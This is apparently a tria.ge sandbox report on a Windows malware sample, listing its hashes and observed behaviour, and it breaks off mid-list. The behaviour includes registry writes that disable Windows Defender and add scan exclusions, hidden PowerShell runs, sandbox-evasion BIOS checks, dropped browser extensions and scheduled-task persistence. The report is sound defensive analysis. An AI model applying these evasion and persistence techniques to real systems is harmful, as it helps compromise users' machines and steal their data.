Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
241s -
max time network
242s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
04/07/2024, 22:31
Static task
static1
Behavioral task
behavioral1
Sample
10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe
Resource
win7-20240508-en
General
-
Target
10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe
-
Size
7.3MB
-
MD5
c2df41992227f86b379c86fd50163bb6
-
SHA1
3e21789c16009856e163810185bf1c59c111e5e2
-
SHA256
10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733
-
SHA512
7778aa741ec19f3092dca2ad2303f946e949db0f5e538938914fae0004a2718c4ec705c962810d3aab4e9e887598c30a48204a7ad181e117583131882627629d
-
SSDEEP
196608:91OG1qxZQHVAj+aBt4P81+pgdwBtQ5Eck5++QI:3OG1EZiVRC4PucBBK5t+QI
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\namDtuGKU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kwkuzFKVqEUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bgwuTdWixDdNC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BRUhuLZnBvQZvqVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wEnnazEvJNiU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\namDtuGKU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BRUhuLZnBvQZvqVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kwkuzFKVqEUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bgwuTdWixDdNC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wEnnazEvJNiU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 876 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2956 powershell.EXE 840 powershell.EXE 1820 powershell.exe 2664 powershell.EXE 2508 powershell.exe 1988 powershell.exe 2728 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Control Panel\International\Geo\Nation PpZzsTE.exe -
Executes dropped EXE 4 IoCs
pid Process 300 Install.exe 3056 Install.exe 1684 cbFljeS.exe 1292 PpZzsTE.exe -
Loads dropped DLL 23 IoCs
pid Process 2980 10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe 300 Install.exe 300 Install.exe 300 Install.exe 300 Install.exe 3056 Install.exe 3056 Install.exe 3056 Install.exe 2688 WerFault.exe 2688 WerFault.exe 2688 WerFault.exe 876 rundll32.exe 876 rundll32.exe 876 rundll32.exe 876 rundll32.exe 2952 WerFault.exe 2952 WerFault.exe 2952 WerFault.exe 2952 WerFault.exe 2952 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json PpZzsTE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json PpZzsTE.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol cbFljeS.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini cbFljeS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 PpZzsTE.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 PpZzsTE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol cbFljeS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 PpZzsTE.exe File created C:\Windows\system32\GroupPolicy\gpt.ini cbFljeS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PpZzsTE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 PpZzsTE.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi PpZzsTE.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi PpZzsTE.exe File created C:\Program Files (x86)\namDtuGKU\GxToifo.xml PpZzsTE.exe File created C:\Program Files (x86)\wEnnazEvJNiU2\pnaRKEd.xml PpZzsTE.exe File created C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\dcbafRZ.dll PpZzsTE.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PpZzsTE.exe File created C:\Program Files (x86)\bgwuTdWixDdNC\dyhsspk.dll PpZzsTE.exe File created C:\Program Files (x86)\kwkuzFKVqEUn\LjyFifh.dll PpZzsTE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PpZzsTE.exe File created C:\Program Files (x86)\wEnnazEvJNiU2\WpVAbGLhdZTxQ.dll PpZzsTE.exe File created C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\OaLnrZu.xml PpZzsTE.exe File created C:\Program Files (x86)\bgwuTdWixDdNC\wKttDmN.xml PpZzsTE.exe File created C:\Program Files (x86)\namDtuGKU\pAGhZx.dll PpZzsTE.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bsqNJSiTyoMLfdbIdy.job schtasks.exe File created C:\Windows\Tasks\KdMGsZYUagVlNoZLt.job schtasks.exe File created C:\Windows\Tasks\jRbEfcGJuWiRduS.job schtasks.exe File created C:\Windows\Tasks\kPVQaxkVtdiJeIOQR.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2688 1684 WerFault.exe 41 2952 3056 WerFault.exe 29 2500 1292 WerFault.exe 185 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PpZzsTE.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5D3D8030-3540-49D5-8CE4-E4C7BBA39715}\WpadDecisionTime = d07e7a4762ceda01 PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections PpZzsTE.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" PpZzsTE.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10ae0d3662ceda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs PpZzsTE.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing PpZzsTE.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cbFljeS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5D3D8030-3540-49D5-8CE4-E4C7BBA39715} PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My PpZzsTE.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot PpZzsTE.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5D3D8030-3540-49D5-8CE4-E4C7BBA39715}\WpadNetworkName = "Network 3" PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs PpZzsTE.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-5d-4d-29-31-76\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-5d-4d-29-31-76\WpadDecisionReason = "1" PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-5d-4d-29-31-76 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000010a3fa3562ceda01 cbFljeS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-5d-4d-29-31-76 PpZzsTE.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-5d-4d-29-31-76\WpadDecisionTime = d07e7a4762ceda01 PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs PpZzsTE.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-5d-4d-29-31-76\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs PpZzsTE.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-5d-4d-29-31-76\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cbFljeS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cbFljeS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed PpZzsTE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs PpZzsTE.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1756 schtasks.exe 1892 schtasks.exe 2212 schtasks.exe 3064 schtasks.exe 2912 schtasks.exe 1556 schtasks.exe 2068 schtasks.exe 1040 schtasks.exe 2724 schtasks.exe 2772 schtasks.exe 2732 schtasks.exe 1832 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2728 powershell.exe 2956 powershell.EXE 2956 powershell.EXE 2956 powershell.EXE 840 powershell.EXE 840 powershell.EXE 840 powershell.EXE 1820 powershell.exe 2664 powershell.EXE 2664 powershell.EXE 2664 powershell.EXE 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 2508 powershell.exe 1292 PpZzsTE.exe 1988 powershell.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe 1292 PpZzsTE.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2728 powershell.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe Token: SeSecurityPrivilege 2632 WMIC.exe Token: SeTakeOwnershipPrivilege 2632 WMIC.exe Token: SeLoadDriverPrivilege 2632 WMIC.exe Token: SeSystemProfilePrivilege 2632 WMIC.exe Token: SeSystemtimePrivilege 2632 WMIC.exe Token: SeProfSingleProcessPrivilege 2632 WMIC.exe Token: SeIncBasePriorityPrivilege 2632 WMIC.exe Token: SeCreatePagefilePrivilege 2632 WMIC.exe Token: SeBackupPrivilege 2632 WMIC.exe Token: SeRestorePrivilege 2632 WMIC.exe Token: SeShutdownPrivilege 2632 WMIC.exe Token: SeDebugPrivilege 2632 WMIC.exe Token: SeSystemEnvironmentPrivilege 2632 WMIC.exe Token: SeRemoteShutdownPrivilege 2632 WMIC.exe Token: SeUndockPrivilege 2632 WMIC.exe Token: SeManageVolumePrivilege 2632 WMIC.exe Token: 33 2632 WMIC.exe Token: 34 2632 WMIC.exe Token: 35 2632 WMIC.exe Token: SeDebugPrivilege 2956 powershell.EXE Token: SeDebugPrivilege 840 powershell.EXE Token: SeDebugPrivilege 1820 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2704 WMIC.exe Token: SeIncreaseQuotaPrivilege 2704 WMIC.exe Token: SeSecurityPrivilege 2704 WMIC.exe Token: SeTakeOwnershipPrivilege 2704 WMIC.exe Token: SeLoadDriverPrivilege 2704 WMIC.exe Token: SeSystemtimePrivilege 2704 WMIC.exe Token: SeBackupPrivilege 2704 WMIC.exe Token: SeRestorePrivilege 2704 WMIC.exe Token: SeShutdownPrivilege 2704 WMIC.exe Token: SeSystemEnvironmentPrivilege 2704 WMIC.exe Token: SeUndockPrivilege 2704 WMIC.exe Token: SeManageVolumePrivilege 2704 WMIC.exe Token: SeDebugPrivilege 2664 powershell.EXE Token: SeDebugPrivilege 2508 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1656 WMIC.exe Token: SeIncreaseQuotaPrivilege 1656 WMIC.exe Token: SeSecurityPrivilege 1656 WMIC.exe Token: SeTakeOwnershipPrivilege 1656 WMIC.exe Token: SeLoadDriverPrivilege 1656 WMIC.exe Token: SeSystemtimePrivilege 1656 WMIC.exe Token: SeBackupPrivilege 1656 WMIC.exe Token: SeRestorePrivilege 1656 WMIC.exe Token: SeShutdownPrivilege 1656 WMIC.exe Token: SeSystemEnvironmentPrivilege 1656 WMIC.exe Token: SeUndockPrivilege 1656 